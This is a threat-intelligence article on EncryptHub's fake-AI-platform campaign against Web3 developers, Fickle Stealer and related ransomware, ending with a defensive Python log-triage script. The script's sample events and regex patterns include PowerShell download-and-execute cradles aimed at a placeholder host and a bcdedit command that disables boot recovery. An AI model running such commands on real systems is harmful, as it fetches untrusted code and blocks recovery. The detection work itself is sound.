
EncryptHub Targets Web3 Developers with Fake AI Platforms and Fickle Stealer Malware
What is EncryptHub and Their Latest Attack Campaign
EncryptHub, also known as LARVA-208 and Water Gamayun, is a financially motivated threat actor group that has launched a sophisticated new campaign targeting Web3 developers. This cybercriminal organization has evolved from deploying ransomware to using information stealer malware to harvest sensitive data from cryptocurrency wallets and development credentials.
How EncryptHub Targets Web3 Developers
Why Web3 Developers Are Prime Targets
Web3 developers present an ideal target for cybercriminals due to several factors:
Management of cryptocurrency wallets with high-value assets
Access to smart contract repositories and sensitive test environments
Many work as freelancers or across multiple decentralized projects
Lack of the protection that traditional enterprise security controls provide
High-value targets that can be monetized quickly
The Fake AI Platform Deception
EncryptHub operators create convincing fake artificial intelligence platforms, including Norlax AI, which mimics legitimate services such as Teampilot. These deceptive platforms serve as the primary attack vector for luring unsuspecting Web3 developers.
The Attack Chain: From Social Engineering to Malware Deployment
Initial Contact and Social Engineering
The attack begins with threat actors contacting Web3 developers through multiple channels:
Direct messages on X (formerly Twitter) and Telegram
Job interview requests targeting developers following Web3 and blockchain content
Portfolio review offers sent through professional networks
Job applications posted on Remote3, a Web3-specific job board
Bypassing Security Warnings
To circumvent security warnings issued by platforms like Remote3, attackers employ a clever two-stage approach:
Initial conversation conducted via legitimate Google Meet
Transition to the fake Norlax AI platform under the pretext of continuing the interview
The Malware Deployment Process
Once victims access the fake meeting platform, they encounter:
Prompts to enter an email address and an invitation code
Fake error messages claiming outdated or missing audio drivers
Download prompts for malicious software disguised as Realtek HD Audio Driver
PowerShell command execution to retrieve and deploy Fickle Stealer malware
Fickle Stealer: The Primary Malware Payload
Capabilities and Data Harvesting
Fickle Stealer is a sophisticated information-stealing malware that targets:
Cryptocurrency wallet credentials and private keys
Development environment access credentials
Sensitive project data and source code
Browser-stored passwords and authentication tokens
System information and network configurations
Data Exfiltration to SilentPrism
All harvested information is transmitted to an external command-and-control server codenamed SilentPrism, where cybercriminals can access and monetize the stolen data through illicit markets.
Recent Developments: Steam Game Compromise
Chemia Game Infiltration
In July 2025, researchers discovered that EncryptHub had compromised a Steam game called Chemia to distribute malware. Key details include:
Malicious binaries embedded directly into the game executable
Distribution of both Fickle Stealer and Hijack Loader
Hijack Loader subsequently drops Vidar Stealer
Game removed from Steam platform following discovery
Emerging Ransomware Threats: KAWA4096 and Crux
KAWA4096 Ransomware Characteristics
A new ransomware strain called KAWA4096 has emerged with notable features:
Style similarities to Akira ransomware group
Ransom note format resembling Qilin ransomware
Targets primarily in United States and Japan
Advanced multithreading capabilities for faster encryption
Network drive encryption capabilities
Crux Ransomware Operations
The Crux ransomware group claims association with BlackByte and demonstrates:
Use of valid RDP credentials for initial access
Legitimate Windows tools for stealth operations
Boot configuration modifications to prevent system recovery
Preference for processes like svchost.exe and bcdedit.exe
Protection Strategies for Web3 Developers
Security Best Practices
To protect against EncryptHub and similar threats, Web3 developers should:
Verify legitimacy of job opportunities and portfolio review requests
Use only official communication channels for professional interactions
Implement multi-factor authentication on all development accounts
Maintain offline backups of cryptocurrency wallet keys
Take part in regular security awareness training focused on social engineering
Technical Security Measures
Deploy endpoint detection and response (EDR) solutions
Monitor for suspicious PowerShell activity
Implement application whitelisting for development environments
Conduct regular vulnerability assessments and penetration testing
Segment networks to limit lateral movement
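As an added example, not code from the original article or from any vendor it mentions, the Python script below shows how a defender might triage Windows PowerShell script-block (Event ID 4104) and process-creation (Event ID 4688) log entries for the two behaviours this article describes: a PowerShell download-and-execute step of the kind used to fetch Fickle Stealer, and bcdedit changes that disable boot recovery, as attributed to Crux. Every log entry in the sample is constructed, the "event_id"/"text" field names are an assumed log schema, and the regular expressions and the base64 length threshold are assumptions a real deployment would tune.

```python
"""Triage Windows PowerShell / process-creation log entries for two behaviours:
PowerShell download-and-execute stagers and bcdedit changes that disable boot
recovery. All log samples below are constructed for this example."""
import base64
import binascii
import re

# Remote-fetch primitives commonly seen in PowerShell one-liners.
DOWNLOAD_RE = re.compile(
    r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|net\.webclient"
    r"|start-bitstransfer|invoke-restmethod|\birm\b",
    re.IGNORECASE,
)
# In-memory execution of whatever was fetched.
EXEC_RE = re.compile(r"invoke-expression|\biex\b", re.IGNORECASE)
# -e / -ec / -enc / -EncodedCommand followed by a base64 blob (length threshold assumed).
ENCODED_RE = re.compile(
    r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE
)
# bcdedit invocations that remove the recovery environment or ignore boot failures.
BCD_RE = re.compile(
    r"bcdedit(?:\.exe)?.*?(recoveryenabled\s+no|bootstatuspolicy\s+ignoreallfailures)",
    re.IGNORECASE | re.DOTALL,
)


def decode_encoded_command(text):
    """Return the decoded -EncodedCommand payload (base64 of UTF-16LE) or None."""
    m = ENCODED_RE.search(text)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError):
        return None


def analyze_event(event):
    """Return the list of detection reasons for one event (empty list = nothing flagged)."""
    reasons = []
    text = event["text"]
    decoded = decode_encoded_command(text)
    if decoded is not None:
        reasons.append("encoded PowerShell command")
        text = text + "\n" + decoded  # inspect the decoded script as well as the raw line
    if DOWNLOAD_RE.search(text) and EXEC_RE.search(text):
        reasons.append("download-and-execute cradle")
    if BCD_RE.search(text):
        reasons.append("boot recovery disabled via bcdedit")
    return reasons


def triage(events):
    """Return [(index, reasons)] for every event that raised at least one reason."""
    hits = []
    for i, ev in enumerate(events):
        reasons = analyze_event(ev)
        if reasons:
            hits.append((i, reasons))
    return hits


def _encode_ps(script):
    """Encode a script the way powershell.exe -EncodedCommand expects (used to build the sample)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed sample events: 4104 = PowerShell script block log, 4688 = process creation.
# example.invalid is a reserved test domain, not a real indicator.
SAMPLE_EVENTS = [
    {"event_id": 4104, "text": "Get-ChildItem C:\\Users\\dev\\project | Measure-Object"},
    {"event_id": 4104, "text": "$c = New-Object Net.WebClient; IEX $c.DownloadString('http://example.invalid/RealtekHD.ps1')"},
    {"event_id": 4688, "text": "powershell.exe -nop -w hidden -enc "
     + _encode_ps("iex (iwr http://example.invalid/stage2 -UseBasicParsing).Content")},
    {"event_id": 4688, "text": "bcdedit.exe /set {default} recoveryenabled No"},
    {"event_id": 4688, "text": "powershell.exe -File C:\\build\\run-tests.ps1"},
]

if __name__ == "__main__":
    for idx, reasons in triage(SAMPLE_EVENTS):
        print(f"event {idx} (id {SAMPLE_EVENTS[idx]['event_id']}): {', '.join(reasons)}")
```

Running the script flags the script-block cradle, the encoded process-creation line (after decoding it) and the bcdedit recovery change, while leaving the two ordinary developer commands alone. Decoding -EncodedCommand before matching matters because the download and execution keywords are otherwise invisible in the raw command line, which is exactly why that flag is attractive to attackers and worth logging at scale.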
Industry Response and Future Implications
Shift in Cybercriminal Monetization
EncryptHub's evolution from ransomware to information stealing represents a broader trend in cybercrime monetization strategies. The focus on cryptocurrency-related targets reflects the high-value nature of Web3 assets and the relatively immature security posture of the decentralized finance ecosystem.
Recommendations for Web3 Organizations
Organizations in the Web3 space should prioritize:
Enhanced security awareness training for development teams
Implementation of zero-trust security architectures
Regular security audits of development environments
Incident response planning specific to cryptocurrency theft
Collaboration with threat intelligence providers for early warning systems
Conclusion
The EncryptHub campaign against Web3 developers represents a sophisticated evolution in cybercriminal tactics, combining social engineering with advanced malware deployment techniques. As the Web3 ecosystem continues to grow, security measures must evolve to protect valuable cryptocurrency assets and development infrastructure from these targeted attacks.